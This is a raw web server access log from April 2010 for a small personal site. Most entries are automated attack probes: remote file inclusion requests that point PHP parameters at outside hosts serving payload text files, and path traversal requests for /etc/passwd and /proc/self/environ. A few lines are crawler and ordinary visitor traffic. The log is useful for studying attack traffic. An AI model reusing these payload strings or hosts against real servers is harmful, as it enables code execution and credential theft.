207.46.195.231 - - [28/Apr/2010:14:16:54 -0500] "GET /logs/access_log.1196294400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.225 - - [28/Apr/2010:14:17:25 -0500] "GET /logs/access_log.1205971200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.146.38 - - [28/Apr/2010:14:18:29 -0500] "GET /logs/access_log.1219708800%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:18:29 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:18:30 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
110.15.200.48 - - [28/Apr/2010:14:22:33 -0500] "GET //appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
110.15.200.48 - - [28/Apr/2010:14:22:33 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
110.15.200.48 - - [28/Apr/2010:14:22:33 -0500] "GET /logs/access_log.1271030400%20%20//appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:22:55 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:22:56 -0500] "GET /logs/access_log.1219708800//PhpLinkExchange/bits_listings.php?svr_rootP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:22:56 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
110.15.200.48 - - [28/Apr/2010:14:22:59 -0500] "GET //appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
110.15.200.48 - - [28/Apr/2010:14:22:59 -0500] "GET /logs/access_log.1271030400%20%20//appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
110.15.200.48 - - [28/Apr/2010:14:23:00 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cevup.com/images/bogel/id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:14:25:44 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
123.30.181.5 - - [28/Apr/2010:14:25:53 -0500] "GET //inc/formmail.inc.php?script_root=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:25:53 -0500] "GET /logs//inc/formmail.inc.php?script_root=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:25:53 -0500] "GET /logs/access_log.1212105600%20%20//inc/formmail.inc.php?script_root=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:25:55 -0500] "GET /logs//inc/formmail.inc.php?script_root=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:25:56 -0500] "GET //inc/formmail.inc.php?script_root=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:25:58 -0500] "GET /logs/access_log.1212105600%20%20//inc/formmail.inc.php?script_root=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.26.227.88 - - [28/Apr/2010:14:29:51 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://tulungaungan.zoomshare.com/files/r1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.26.227.88 - - [28/Apr/2010:14:29:51 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://tulungaungan.zoomshare.com/files/r1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
212.26.227.88 - - [28/Apr/2010:14:29:51 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://tulungaungan.zoomshare.com/files/r1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:14:33:37 -0500] "GET /logs/access_log.1220054400/modules/My_eGallery/public/displayCategory.php?basepath=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:14:33:40 -0500] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
189.108.172.26 - - [28/Apr/2010:14:33:40 -0500] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:14:33:49 -0500] "GET /logs/access_log.1212969600//faqsupport/samplefaqsupport.php?path[docroot]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 343 "-""libwww-perl/5.834"
188.72.243.72 - - [28/Apr/2010:14:33:49 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
188.72.243.72 - - [28/Apr/2010:14:33:49 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
115.124.118.10 - - [28/Apr/2010:14:34:06 -0500] "GET /logs//index2.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
115.124.118.10 - - [28/Apr/2010:14:34:06 -0500] "GET //index2.php?../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
188.72.243.72 - - [28/Apr/2010:14:34:47 -0500] "GET /logs/access_log.1220054400//faqsupport/samplefaqsupport.php?path[docroot]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 343 "-""libwww-perl/5.834"
202.72.242.242 - - [28/Apr/2010:14:36:44 -0500] "GET ///vwar/backup/errors.php?error=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
202.72.242.242 - - [28/Apr/2010:14:36:44 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.72.242.242 - - [28/Apr/2010:14:36:44 -0500] "GET /logs/access_log.1219363200%20%20///vwar/backup/errors.php?error=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.195.112.180 - - [28/Apr/2010:14:37:41 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.30.181.5 - - [28/Apr/2010:14:38:22 -0500] "GET /logs/access_log.1271030400%20%20//inc/formmail.inc.php?script_root=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:38:43 -0500] "GET /logs/access_log.1271030400%20%20//inc/formmail.inc.php?script_root=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:14:40:23 -0500] "GET /logs//common/db.php?commonpath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:14:40:23 -0500] "GET //common/db.php?commonpath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:14:40:23 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.112.83.166 - - [28/Apr/2010:14:40:44 -0500] "GET /logs/access_log.1212969600//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
217.112.83.166 - - [28/Apr/2010:14:40:44 -0500] "GET //?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
217.112.83.166 - - [28/Apr/2010:14:40:44 -0500] "GET /logs//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3477 "-""libwww-perl/5.831"
217.112.83.166 - - [28/Apr/2010:14:40:46 -0500] "GET /logs/access_log.1212969600//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
217.112.83.166 - - [28/Apr/2010:14:40:46 -0500] "GET //?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
217.112.83.166 - - [28/Apr/2010:14:40:46 -0500] "GET /logs//?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3477 "-""libwww-perl/5.831"
207.46.199.55 - - [28/Apr/2010:14:40:54 -0500] "GET /logs/access_log.1168560000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.1.44.193 - - [28/Apr/2010:14:41:07 -0500] "GET /logs/setup.php?dir=http://77.92.94.85/echos.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
87.1.44.193 - - [28/Apr/2010:14:41:07 -0500] "GET /setup.php?dir=http://77.92.94.85/echos.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
121.190.102.21 - - [28/Apr/2010:14:41:09 -0500] "GET //common/db.php?commonpath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:14:41:09 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:14:41:09 -0500] "GET /logs//common/db.php?commonpath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:41:17 -0500] "GET /logs/access_log.1264377600//sources/join.php?FORM[url]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:41:17 -0500] "GET /logs//sources/join.php?FORM[url]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:41:17 -0500] "GET //sources/join.php?FORM[url]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:41:25 -0500] "GET /logs/access_log.1263427200//sources/join.php?FORM[url]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:41:47 -0500] "GET /logs/access_log.1264377600//sources/join.php?FORM[url]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:41:47 -0500] "GET /logs//sources/join.php?FORM[url]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:41:47 -0500] "GET //sources/join.php?FORM[url]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:41:51 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:41:51 -0500] "GET /logs//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:41:51 -0500] "GET //common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
123.30.181.5 - - [28/Apr/2010:14:42:01 -0500] "GET /logs/access_log.1263427200//sources/join.php?FORM[url]=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:05 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:05 -0500] "GET //common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:05 -0500] "GET /logs//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:06 -0500] "GET //common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:06 -0500] "GET /logs//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:06 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:12 -0500] "GET /logs//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:12 -0500] "GET //common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:12 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:15 -0500] "GET //common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:15 -0500] "GET /logs//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:42:15 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
213.175.215.92 - - [28/Apr/2010:14:44:12 -0500] "GET /logs/index.php?visualizar=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
213.175.215.92 - - [28/Apr/2010:14:44:12 -0500] "GET /index.php?visualizar=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
202.72.242.242 - - [28/Apr/2010:14:44:54 -0500] "GET /logs/access_log.1220054400///vwar/backup/errors.php?error=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
202.72.242.242 - - [28/Apr/2010:14:44:54 -0500] "GET ///vwar/backup/errors.php?error=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
202.72.242.242 - - [28/Apr/2010:14:44:54 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.rittsound.com//modules/copyme.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:45:10 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [28/Apr/2010:14:45:50 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:47:19 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:47:19 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:47:20 -0500] "GET /logs/access_log.1251504000//classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:47:27 -0500] "GET /logs/access_log.1237334400//classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
116.193.76.88 - - [28/Apr/2010:14:48:28 -0500] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3472 "-""libwww-perl/5.810"
116.193.76.88 - - [28/Apr/2010:14:48:29 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
188.72.243.72 - - [28/Apr/2010:14:48:43 -0500] "GET /logs//modules/popnupblog/class/sendmail.php?incpath=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:14:48:43 -0500] "GET //modules/popnupblog/class/sendmail.php?incpath=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
188.72.243.72 - - [28/Apr/2010:14:48:44 -0500] "GET /logs/access_log.1254096000//modules/popnupblog/class/sendmail.php?incpath=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:49:24 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:49:42 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
77.221.130.13 - - [28/Apr/2010:14:49:48 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:49:57 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:49:58 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:14:50:00 -0500] "GET /logs/access_log.1219363200%20%20//classes/adodbt/sql.php?classes_dir=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.52.35.234 - - [28/Apr/2010:14:50:07 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
77.221.130.13 - - [28/Apr/2010:14:50:40 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
200.34.175.15 - - [28/Apr/2010:14:52:22 -0500] "GET /logs/access_log.1262390400/index.php?sourcedir=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.34.175.15 - - [28/Apr/2010:14:52:22 -0500] "GET /logs/index.php?sourcedir=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.34.175.15 - - [28/Apr/2010:14:52:22 -0500] "GET /logs/access_log.1264550400/index.php?sourcedir=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.34.175.15 - - [28/Apr/2010:14:52:22 -0500] "GET /index.php?sourcedir=http://westtecnology.com.br/imagens/system/ssh/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
207.46.204.233 - - [28/Apr/2010:14:52:26 -0500] "GET /logs/access_log.1232323200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.41 - - [28/Apr/2010:14:54:55 -0500] "GET /logs/access_log.1201392000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.52.35.234 - - [28/Apr/2010:14:59:16 -0500] "GET /logs/access_log.1211760000/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
74.52.35.234 - - [28/Apr/2010:14:59:16 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.52.35.234 - - [28/Apr/2010:14:59:17 -0500] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3472 "-""libwww-perl/5.834"
90.218.247.68 - - [28/Apr/2010:15:00:13 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://images.google.co.uk/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=18&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26um%3D1%26hl%3Den%26safe%3Doff%26client%3Dsafari%26rls%3Den-us%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:14 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:14 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:14 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:14 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:14 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:15 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://images.google.co.uk/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=18&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26um%3D1%26hl%3Den%26safe%3Doff%26client%3Dsafari%26rls%3Den-us%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tat-cd1.jpg""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:17 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:17 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:17 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
90.218.247.68 - - [28/Apr/2010:15:00:17 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
151.1.253.1 - - [28/Apr/2010:15:00:33 -0500] "GET /logs/access_log.1263859200/index.php?openfile=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
151.1.253.1 - - [28/Apr/2010:15:00:33 -0500] "GET /logs/index.php?openfile=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
151.1.253.1 - - [28/Apr/2010:15:00:33 -0500] "GET /index.php?openfile=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
151.1.253.1 - - [28/Apr/2010:15:00:43 -0500] "GET /logs/access_log.1265068800/index.php?openfile=http://takesi.freewebhostx.com/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.248.150.84 - - [28/Apr/2010:15:02:50 -0500] "GET /logs/access_log.1264636800//kalasd2006/board/bbs//delete_comment.php?board_skin_path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
